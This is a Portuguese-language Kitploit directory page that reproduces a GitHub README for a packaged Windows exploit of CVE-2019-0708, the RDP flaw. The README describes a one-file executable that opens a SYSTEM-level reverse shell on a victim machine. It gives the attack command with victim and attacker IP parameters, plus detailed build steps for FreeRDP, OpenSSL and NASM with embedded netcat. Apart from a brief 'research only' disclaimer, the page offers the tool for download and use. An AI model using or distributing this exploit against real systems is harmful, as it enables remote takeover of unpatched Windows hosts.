Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-0708-EXP-Windows — CVE-2019-0708-EXP — versão Windows em exe de arquivo único; após a execução, abre diretamente um Shell com privilégios de System no console atual. | Kitploit
Ferramentas/GitHubGitHub/cbwang505/cve-2019-0708-exp-windows
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoShellcodeTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubcbwang505/cve-2019-0708-exp-windows

CVE-2019-0708-EXP-Windows

CVE-2019-0708-EXP — versão Windows em exe de arquivo único; após a execução, abre diretamente um Shell com privilégios de System no console atual.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver RepositórioSite
31768há 6 anosRevisado pelo Kitploit

CVE-2019-0708-EXP-Windows-Version

Declaração

O poc do autor é apenas para fins de pesquisa. Se o leitor utilizar este poc para outras atividades, não tem relação comigo.

Índice

[toc]

Introdução

A versão CVE-2019-0708-EXP-Windows executa como um único arquivo exe, sem necessidade de linux, python, ruby, etc. Após a execução, estabelece diretamente um Shell reverso com privilégios de System no console atual.

A compilação usa o modo de biblioteca totalmente estática, embutindo todos os dlls, integra netcat e openssl, suporta exibição de barra de progresso e operações de echo do shell.

Ambiente de Reprodução

  1. Sistema operacional da vítima (Victim): Windows 7 sp1 x64
  2. Sistema operacional do atacante (Attacker): Windows 10 x64
  3. Ambiente de compilação: Visual Studio 2013

Instruções de uso

  1. Entre no diretório CVE-2019-0708-EXP-Release
  2. Execute wfreerdp.exe /v:Victim_IP /l:Attacker_IP, por exemplo, wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17

Tutorial de instalação

  1. Copie o projeto FreeRDP-master para E:\git\KernelResearch\FreeRDP-master\
  2. Instale o ambiente de compilação do Openssl, ou extraia diretamente o openssl.7z para C:\openssl\ para usar o ambiente Openssl já compilado.
  3. Instale o ambiente de compilação do Nasm
  4. Instale o cmake-3.15.3-win64-x64.msi como administrador
  5. Adicione C:\Program Files\CMake\bin à variável de ambiente path
  6. Reinicie o computador
  7. Execute "C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt
  8. Compile o projeto. Se ainda houver arquivos faltando, você pode restaurá-los a partir de FreeRDP-master-restore.7z
Tutorial de instalação do ambiente de compilação do Openssl
  1. Extraia openssl-1.0.2s.tar.gz para C:\openssl\
  2. Instale ActivePerl-5.28.1.0000-MSWin32-x64-fde9aa8a.msi
  3. Adicione C:\Perl64\bin à variável de ambiente path
  4. Abra o Prompt de Comando de Ferramentas Nativas VS2013 x64, que pode ser encontrado no menu Iniciar
  5. Execute perl Configure VC-WIN64A
  6. Execute cd /d C:\openssl\
  7. Execute ms\do_win64a
  8. Em seguida, comece a compilar. Você pode usar os seguintes modos. O exp usa o modo de biblioteca estática:

Compile a biblioteca dinâmica do OpenSSL: nmake -f ms\ntdll.mak Compile a biblioteca estática do OpenSSL: nmake -f ms\nt.mak Teste a biblioteca dinâmica do OpenSSL: nmake -f ms\ntdll.mak test Teste a biblioteca estática do OpenSSL: nmake -f ms\nt.mak test Instale a biblioteca dinâmica do OpenSSL: nmake -f ms\ntdll.mak install Instale a biblioteca estática do OpenSSL: nmake -f ms\nt.mak install Limpe a compilação anterior da biblioteca dinâmica do OpenSSL, para recompilar: nmake -f ms\ntdll.mak clean Limpe a compilação anterior da biblioteca estática do OpenSSL, para recompilar: nmake -f ms\nt.mak clean

  1. Após a conclusão, vá até out32, encontre os arquivos libeay32.lib e ssleay32.lib e copie-os para C:\openssl\lib\
Tutorial de instalação do ambiente de compilação Nasm
  1. Instale o nasm-2.14.02-installer-x64.exe como administrador
  2. Adicione C:\Program Files\NASM à variável de ambiente path
  3. Extraia os 3 arquivos do nasmBuildCustomizations.rar para C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\
  4. Selecione o diretório do projeto client->common->freerdp-client, clique com o botão direito -> "Dependências de Build" -> "Personalizações de Build" e marque o item nasm (observe que não é masm)
  5. Se, no projeto freerdp-client, você selecionar qualquer arquivo asm e o menu de contexto exibir uma opção de compilação, isso significa que o ambiente de compilação Nasm foi instalado com sucesso.

Resultado da execução

Clique para ver a imagem ampliada

Hospedagem do projeto

Meu endereço do poc

Contribuições

O autor é de ZheJiang Guoli Security Technology, e-mail: [email protected].

Baixar ferramenta